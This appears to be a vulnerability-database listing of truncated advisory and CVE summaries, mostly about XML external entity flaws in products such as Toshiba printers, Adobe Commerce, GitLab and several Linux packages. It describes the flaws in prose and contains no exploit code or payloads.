ClassGraph XML External Entity Reference

ClassGraph before 4.8.112 was not resistant to XML eXternal Entity XXE attacks...

CVE-2023-49110

When the Kiuwan Local Analyzer uploads the scan results to the Kiuwan SAST web application either on-premises or cloud/SaaS solution, the transmitted data consists of a ZIP archive containing several files, some of them in the XML file format. During Kiuwan's server-side processing of these XML...

OPENSUSE-SU-2024:10516-1 perl-XML-LibXML-2.0128-1.3 on GA media

These are all security issues fixed in the perl-XML-LibXML-2.0128-1.3 package on the GA media of openSUSE Tumbleweed...

OPENSUSE-SU-2024:11164-1 perl-XML-Twig-3.52-2.8 on GA media

These are all security issues fixed in the perl-XML-Twig-3.52-2.8 package on the GA media of openSUSE Tumbleweed...

OPENSUSE-SU-2024:11693-1 xml-security-2.1.7-1.1 on GA media

These are all security issues fixed in the xml-security-2.1.7-1.1 package on the GA media of openSUSE Tumbleweed...

CVE-2024-27142

Toshiba printers use XML communication for the API endpoint provided by the printer. For the endpoint, XML parsing library is used and it is vulnerable to a time-based blind XML External Entity XXE vulnerability. An attacker can DoS the printers. An attacker can exploit the XXE to retrieve...

CVE-2024-27142

CVE-2024-27142 affects Toshiba printers’ API endpoint that uses an XML parsing library vulnerable to time-based blind XML External Entity (XXE). The vulnerability can lead to Denial of Service and information disclosure. Connected sources (including NVD/NIST entry) confirm the API/XML handling as...

CVE-2024-27141

CVE-2024-27141 affects Toshiba printers’ XML API endpoint. The XML parsing library is vulnerable to a time-based blind XML External Entity (XXE) attack, enabling unauthenticated HTTP requests to cause DoS and potentially retrieve information. Connected sources corroborate a multi-vendor vulnerabi...

Security Bulletin: AIX is affected by information disclosure due to Python (CVE-2024-28757)

Summary Vulnerability in Python could allow a remote attacker to obtain sensitive information CVE-2024-28757. Python is used by AIX as part of Ansible node management automation. Vulnerability Details CVEID:CVE-2024-28757 DESCRIPTION: libexpat could allow a remote attacker to obtain sensitive...

Magento Open Source affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability

Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference 'XXE' vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that...

CVE-2024-34102

Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference 'XXE' vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that...

Fedora 39 : php (2024-52c23ef1ec)

The remote Fedora 39 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2024-52c23ef1ec advisory. PHP version 8.2.20 06 Jun 2024 CGI: Fixed buffer limit on Windows, replacing read call usage by read. David Carlier Fixed bug GHSA-3qgc-jrrr-25jv...

CVE-2024-4201

A cross-site scripting issue has been discovered in GitLab affecting all versions starting from 5.1 before 16.10.7, all versions starting from 16.11 before 16.111.4, all versions starting from 17.0 before 17.0.2. When viewing an XML file in a repository in raw mode, it can be made to render as HT...

CVE-2024-4201

A cross-site scripting issue has been discovered in GitLab affecting all versions starting from 5.1 before 16.10.7, all versions starting from 16.11 before 16.111.4, all versions starting from 17.0 before 17.0.2. When viewing an XML file in a repository in raw mode, it can be made to render as HT...

CVE-2024-4201 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in GitLab

A cross-site scripting issue has been discovered in GitLab affecting all versions starting from 5.1 before 16.10.7, all versions starting from 16.11 before 16.111.4, all versions starting from 17.0 before 17.0.2. When viewing an XML file in a repository in raw mode, it can be made to render as HT...

CVE-2024-3467 Deserialization of Untrusted Data in AVEVA PI Asset Framework Client

There is a vulnerability in AVEVA PI Asset Framework Client that could allow malicious code to execute on the PI System Explorer environment under the privileges of an interactive user that was socially engineered to import XML supplied by an attacker...

CVE-2024-3467 Deserialization of Untrusted Data in AVEVA PI Asset Framework Client

There is a vulnerability in AVEVA PI Asset Framework Client that could allow malicious code to execute on the PI System Explorer environment under the privileges of an interactive user that was socially engineered to import XML supplied by an attacker...

Fedora 40 : php (2024-49aba7b305)

The remote Fedora 40 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2024-49aba7b305 advisory. PHP version 8.3.8 06 Jun 2024 CGI: Fixed buffer limit on Windows, replacing read call usage by read. David Carlier Fixed bug GHSA-3qgc-jrrr-25jv...

ebookmeta XML External Entity vulnerability

An XML External Entity XXE vulnerability in the ebookmeta.getmetadata function of ebookmeta before v1.2.8 allows attackers to access sensitive information or cause a Denial of Service DoS via crafted XML input...

ZendFramework potential XML eXternal Entity injection vectors

Numerous components utilizing PHP's DOMDocument, SimpleXML, and xmlparse functionality are vulnerable to two types of attacks: - XML eXternal Entity XXE Injection attacks. The above mentioned extensions are insecure by default, allowing external entities to be specified by adding a specific DOCTY...